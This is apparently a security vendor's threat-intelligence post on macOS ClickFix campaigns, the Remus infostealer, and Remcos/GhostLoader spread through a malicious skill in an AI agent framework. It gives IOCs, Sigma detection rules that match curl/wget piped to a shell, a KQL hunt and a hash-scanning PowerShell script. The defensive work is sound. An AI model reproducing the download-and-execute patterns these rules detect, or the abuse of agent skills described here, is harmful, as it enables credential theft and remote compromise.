Back to Intelligence

Remus Stealer, ClickFix & AI Framework Abuse: Cross-Platform Infostealer Campaigns — OTX Pulse Analysis

SA
Security Arsenal Team
May 8, 2026
6 min read

Threat Summary

Recent OTX pulses indicate a convergence of sophisticated social engineering and emerging abuse vectors targeting both macOS and Windows environments. Threat actors are actively deploying ClickFix campaigns on macOS, utilizing fake utility troubleshooting guides to deliver payloads like Macsync, Shub Stealer, and AMOS via malicious Terminal commands. Simultaneously, the Windows ecosystem faces the evolution of Lumma Stealer into Remus, a 64-bit infostealer specifically designed to bypass Application-Bound Encryption (ABE) to extract browser credentials and crypto wallet data. Furthermore, a novel attack vector has been observed involving the weaponization of AI agent frameworks (specifically OpenClaw/"DeepSeek-Claw") to distribute Remcos RAT and GhostLoader via signed binary sideloading.

The collective objective of these campaigns is credential harvesting, cryptocurrency theft, and establishing persistent remote access. The use of signed binaries (GoToMeeting) and trusted AI frameworks highlights a shift toward "living-off-the-land" and supply-chain-adjacent trust exploitation.

Threat Actor / Malware Profile

Remus Stealer (Lumma Successor)

  • Type: 64-bit Information Stealer (Windows).
  • Origin: Evolution of Lumma Stealer; emerged following the doxxing of Lumma core members in late 2025.
  • Capabilities: Bypasses Application-Bound Encryption (ABE) in Chrome/Edge to steal cookies and passwords. Steals cryptocurrency wallet data and 2FA sessions.
  • C2: Uses Ethereum blockchain for C2 communication (EtherHiding) or traditional IP-based infrastructure.

ClickFix Campaign (macOS)

  • Type: Social Engineering / Script-based Dropper.
  • Target: macOS users.
  • Payloads: Macsync, Shub Stealer, AMOS, PhantomPulse.
  • Distribution: Fake blog posts posing as system utility fixes. Victims are tricked into copying and pasting malicious curl commands into Terminal.

Remcos RAT & GhostLoader

  • Type: Remote Access Trojan & Loader.
  • Distribution: Malicious "DeepSeek-Claw" skill within the OpenClaw AI agent framework.
  • Execution: PowerShell command downloads an MSI containing a signed GoToMeeting executable (GoToMeeting.exe). This legitimate binary sideloads a malicious DLL (GhostLoader/Remcos).
  • Persistence: Registry run keys and scheduled tasks.

IOC Analysis

The provided indicators of compromise (IOCs) cover infrastructure and file artifacts associated with these campaigns.

  • Domains: A mix of C2 domains (e.g., dropras.xyz, jihiz.com) and payload delivery infrastructure. SOC teams should immediately block these at the perimeter and DNS resolvers.
  • IP Addresses: Specific ranges (e.g., 217.156.122.0/24) are linked to the Remus stealer infrastructure.
  • File Hashes (MD5/SHA1): Several MD5 and SHA1 hashes correspond to the malicious MSI packages and DLLs used in the OpenClaw/Remcos campaign. These should be added to EDR blocklists and scanned for in quarantines.

Operational Note: These IOCs are "live" and should be treated as high-priority block lists. Due to the use of signed binaries in the Remcos campaign, signature-based detection alone may fail; behavioral heuristics for process injection and sideloading are required.

Detection Engineering

The following detection rules and queries are designed to identify the specific behaviors observed in these pulses.

Sigma Rules

YAML
title: Potential macOS ClickFix Terminal Download
id: 7a8e9f1a-2b3c-4d5e-6f7a-8b9c0d1e2f3a
description: Detects Terminal processes executing curl or wget commands to download executables, a pattern seen in ClickFix campaigns.
author: Security Arsenal
date: 2026/05/08
status: experimental
logsource:
  category: process_creation
  product: macos
detection:
  selection:
    Image|endswith: '/Terminal.app/Contents/MacOS/Terminal'
    CommandLine|contains:
      - 'curl '
      - 'wget '
  selection_download:
    CommandLine|contains:
      - ' | sh'
      - 'chmod +x'
      - 'http://'
  condition: all of selection*
falsepositives:
  - Legitimate software installation via terminal
level: high
tags:
  - attack.execution
  - attack.t1059.04
---
title: Remcos/GhostLoader MSI Sideload via PowerShell
id: b9c0d1e2-3f4a-5b6c-7d8e-9f0a1b2c3d4e
description: Detects PowerShell downloading MSI files which subsequently load DLLs from suspicious paths or via signed binaries, indicative of the OpenClaw Remcos campaign.
author: Security Arsenal
date: 2026/05/08
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection_ps:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'DownloadFile'
      - '.msi'
  selection_msiexec:
    Image|endswith: '\msiexec.exe'
    CommandLine|contains: '.msi'
  selection_sideload:
    Image|endswith:
      - '\GoToMeeting.exe'
      - '\g2mcomm.exe'
    CommandLine|contains: '.dll'
  timeframe: 5m
  condition: selection_ps and (selection_msiexec or selection_sideload)
falsepositives:
  - Legitimate GoToMeeting installation (rare via scripted MSI)
level: critical
tags:
  - attack.defense_evasion
  - attack.t1574.002
---
title: Remus Stealer Network Activity
id: 1c2d3e4f-5a6b-7c8d-9e0f-1a2b3c4d5e6f
description: Detects outbound connections to known Remus Stealer C2 infrastructure IP addresses.
author: Security Arsenal
date: 2026/05/08
status: experimental
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    DestinationIp|startswith:
      - '217.156.122.'
      - '45.151.106.'
    DestinationPort:
      - 80
      - 443
      - 8080
  condition: selection
falsepositives:
  - Unknown (Specific IP ranges)
level: critical
tags:
  - attack.command_and_control
  - attack.c2

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix style PowerShell/Command downloads and OpenClaw Remcos indicators
// Check for processes contacting known malicious domains
DeviceNetworkEvents
| where RemoteUrl has_any ("jihiz.com", "kayeart.com", "bintail.com", "malext.com", "miappl.com", "dropras.xyz", "trackpipe.dev")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP
| union (
    // Check for execution of files with known malicious hashes
    DeviceFileEvents
    | where SHA1 in ("470c3803bd5a4770eb5470a84a831f187f591c64") or MD5 in (
        "1c267cab0a800a7b2d598bc1b112d5ce", "2a5f619c966ef79f4586a433e3d5e7ba", 
        "2c4b7c8b48e6b4e5f3e8854f2abfedb5", "82536825e700f4c863238a90dd314687", 
        "cc1af839a956c8e2bf8e721f5d3b7373"
    )
    | project Timestamp, DeviceName, FileName, FolderPath, SHA1, MD5, InitiatingProcessAccountName
)
| order by Timestamp desc

PowerShell Hunt Script

PowerShell
<#
    IOC Hunter for OpenClaw/Remcos Campaign
    Scans for specific file hashes associated with the malicious MSI and DLL payloads.
#>

$MaliciousMD5 = @(
    "1c267cab0a800a7b2d598bc1b112d5ce",
    "2a5f619c966ef79f4586a433e3d5e7ba",
    "2c4b7c8b48e6b4e5f3e8854f2abfedb5",
    "82536825e700f4c863238a90dd314687",
    "cc1af839a956c8e2bf8e721f5d3b7373"
)

Write-Host "[+] Starting IOC Scan for OpenClaw Remcos/GhostLoader Artifacts..." -ForegroundColor Cyan

# Search C: Drive for files matching MD5 hashes
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | 
ForEach-Object {
    $file = $_
    try {
        $hash = (Get-FileHash -Path $file.FullName -Algorithm MD5 -ErrorAction Stop).Hash.ToLower()
        if ($MaliciousMD5 -contains $hash) {
            Write-Host "[!] MALICIOUS FILE DETECTED: $($file.FullName)" -ForegroundColor Red
            Write-Host "    MD5: $hash" -ForegroundColor Red
        }
    } catch {
        # Ignore access errors
    }
}

# Check for connections to Remus C2 IPs
Write-Host "[+] Checking active connections for Remus C2 IPs..." -ForegroundColor Cyan
$RemusIPs = @("217.156.122.57", "217.156.122.75", "217.156.122.12", "45.151.106.110")
$connections = Get-NetTCPConnection -ErrorAction SilentlyContinue

foreach ($ip in $RemusIPs) {
    $matches = $connections | Where-Object { $_.RemoteAddress -eq $ip }
    if ($matches) {
        Write-Host "[!] C2 CONNECTION DETECTED to $ip" -ForegroundColor Red
        $matches | Format-Table LocalAddress, LocalPort, RemoteAddress, RemotePort, State, OwningProcess
    }
}

Write-Host "Scan Complete." -ForegroundColor Green

Response Priorities

  • Immediate:

    • Block all listed domains and IP ranges at the firewall/proxy level.
    • Scan endpoints for the provided MD5/SHA1 hashes (OpenClaw payload).
    • Kill any processes connecting to 217.156.122.x subnets.

  • 24 Hours:

    • Trigger a forced password reset and MFA re-enrollment for accounts accessed from devices where infostealers (Remus, AMOS, Shub) were detected.
    • Investigate the browser history and download folders on macOS endpoints for signs of "ClickFix" fake utility pages.
    • Review logs for PowerShell execution of MSI files matching the Remcos/GhostLoader pattern.

  • 1 Week:

    • Update application hardening policies to enforce strict signing requirements for PowerShell scripts.
    • Implement DNS filtering for domains commonly used in ClickFix campaigns.
    • Review and restrict the use of AI agent frameworks (like OpenClaw) in development environments to prevent "skill" abuse.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-malwareremus-stealerclickfixremcos-ratinfostealerai-threats

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action